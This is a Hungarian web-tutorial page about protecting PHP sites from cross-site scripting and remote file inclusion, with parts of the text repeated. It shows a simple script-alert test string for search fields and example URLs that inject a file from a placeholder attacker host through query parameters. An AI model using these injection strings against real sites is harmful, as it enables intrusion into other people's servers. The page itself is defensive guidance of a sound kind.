Scriptek
Mielött scriptet használsz fel, készíts minden esetben biztonsági másolatot az oldalról !
[ PHP - Biztonság - XSS Védelem [Feltörték az oldalam ?] ]
XSS Védelem (Cross Site Scripting)
A következő kis leírást, saját tapasztalataim alapján írom le.
Sajnos én is beleestem a régi oldalnál abba a hibába, hogy az oldal gyenge pontját kihasználva XSS vírussal fertőzzenek meg. Fizetős tárhelynél alapból a php allow_url_fopen beállítás engedélyezve van, ami azt jelenti, hogy távoli fájlt lehet behívni az oldalba. Ez akkor baj, ha URL-en keresztül manipulálni tudják az oldalt.....
Nagyon gyakori támadás. Ezt a fajta támadást úgy ismered fel, hogy az adott html fájlba a < /html > tag után a forráskódba egy hosszú script (vírus ) kerül ami, rendszerint ártalmatlannak tűnő értelmetlen kódnak látszik, azonban a látogató böngészőjét is megfertőzheti, aki aztán továbbadja ezt a vírust böngészés közben. Víruskereső programok (Avast) felismerik böngészés közben amelyek rendelkeznek Script Blocker programmal, rendszerint figyelmeztetnek, majd azonnal meg is szakítják az ilyen webhellyel a kapcsolatot, mielőtt a böngésző értelmezné.
Ezzel a módszerrel keresési mező input mező, url változón keresztül is megtámadható az oldal. Kipróbálhatod a saját oldaladon a keresési mezőbe beírva a következő kódrészt:
A következő kis leírást, saját tapasztalataim alapján írom le.
Sajnos én is beleestem a régi oldalnál abba a hibába, hogy az oldal gyenge pontját kihasználva XSS vírussal fertőzzenek meg. Fizetős tárhelynél alapból a php allow_url_fopen beállítás engedélyezve van, ami azt jelenti, hogy távoli fájlt lehet behívni az oldalba. Ez akkor baj, ha URL-en keresztül manipulálni tudják az oldalt.....
Nagyon gyakori támadás. Ezt a fajta támadást úgy ismered fel, hogy az adott html fájlba a < /html > tag után a forráskódba egy hosszú script (vírus ) kerül ami, rendszerint ártalmatlannak tűnő értelmetlen kódnak látszik, azonban a látogató böngészőjét is megfertőzheti, aki aztán továbbadja ezt a vírust böngészés közben. Víruskereső programok (Avast) felismerik böngészés közben amelyek rendelkeznek Script Blocker programmal, rendszerint figyelmeztetnek, majd azonnal meg is szakítják az ilyen webhellyel a kapcsolatot, mielőtt a böngésző értelmezné.
Ezzel a módszerrel keresési mező input mező, url változón keresztül is megtámadható az oldal. Kipróbálhatod a saját oldaladon a keresési mezőbe beírva a következő kódrészt:
kód:
"><script type="text/javascript">alert(':DD');</script>
Ha alert ablak jön fel, akkor le kell védeni a mezőt, a HTML tagokat szűrni kell.
Ezzel a támadással komplett weboldalakat tudnak tönkretenni védekezz ellene !
Gyakori eset, hogy az oldal URL-hez hívnak be egy más oldalon lévő fájlt. ( url injection )
Pl: http://oldalad.hu/index.php?valami=http://támadóoldala.com/valami.kitejesztés???
Vagy: http://oldalad.hu/index.php?_SERVER[DOCUMENT_ROOT]=http://támadóoldala.com/valami.kiterjesztés?
Ezekben a fájlokban ( Ez természetesen lehet .PHP, .HTML, .HTM, .txt..... ) fájl is ) egy PHP program fut le, ami információhoz juttatja a támadót.
Ezek a fájlok nem biztos, hogy mindig a támadó vagy rossz szándékú felhasználó weboldalán vannak. A gyakorlat azt mutatja, hogy egy sebezhető, nem ellenőrzött oldalra rakják fel a fájlt, a tulajdonos tudta nélkül, így kihasználva a honlapot. Fontos tehát ha az oldalra fájlt tölthetnek fel a felhasználók akkor mindenképp ellenőrzött tartalom, méret és kiterjesztés legyen. Ezzel a módszerrel az oldalad sebezhetőségét térképezik fel, majd egy JavaScriptet szúrnak be az oldalba. Ez a skript a gyökérkönyvtár összes létező fájl állományába bemásolja önmagát másodpercek alatt. Ha az oldalon van naplózás érdekes próbálkozásokat láthatsz.
Ha az oldalon van olyan adat amit felhasználó jelentet meg szűrni kell, továbbá minden URL adatot is le kell védeni !
Ezt megteheted htmlspecialchars vagy BBCode használatával. Több infó a Google-n.
Ezzel a támadással komplett weboldalakat tudnak tönkretenni védekezz ellene !
Gyakori eset, hogy az oldal URL-hez hívnak be egy más oldalon lévő fájlt. ( url injection )
Pl: http://oldalad.hu/index.php?valami=http://támadóoldala.com/valami.kitejesztés???
Vagy: http://oldalad.hu/index.php?_SERVER[DOCUMENT_ROOT]=http://támadóoldala.com/valami.kiterjesztés?
Ezekben a fájlokban ( Ez természetesen lehet .PHP, .HTML, .HTM, .txt..... ) fájl is ) egy PHP program fut le, ami információhoz juttatja a támadót.
Ezek a fájlok nem biztos, hogy mindig a támadó vagy rossz szándékú felhasználó weboldalán vannak. A gyakorlat azt mutatja, hogy egy sebezhető, nem ellenőrzött oldalra rakják fel a fájlt, a tulajdonos tudta nélkül, így kihasználva a honlapot. Fontos tehát ha az oldalra fájlt tölthetnek fel a felhasználók akkor mindenképp ellenőrzött tartalom, méret és kiterjesztés legyen. Ezzel a módszerrel az oldalad sebezhetőségét térképezik fel, majd egy JavaScriptet szúrnak be az oldalba. Ez a skript a gyökérkönyvtár összes létező fájl állományába bemásolja önmagát másodpercek alatt. Ha az oldalon van naplózás érdekes próbálkozásokat láthatsz.
Ha az oldalon van olyan adat amit felhasználó jelentet meg szűrni kell, továbbá minden URL adatot is le kell védeni !
Ezt megteheted htmlspecialchars vagy BBCode használatával. Több infó a Google-n.
Nem lehet letölteni a példát ! Feltöltve: 2009.01.07
5 népszerű letöltés
Partnerek
Design
Sucó. http://ingyenweblapok.hu.
Ingyenes weblap
sablonok. 2005-2010
.
Minden jog fenntartva ! Komplett ingyen weblap alkalmazások.
Minden jog fenntartva ! Komplett ingyen weblap alkalmazások.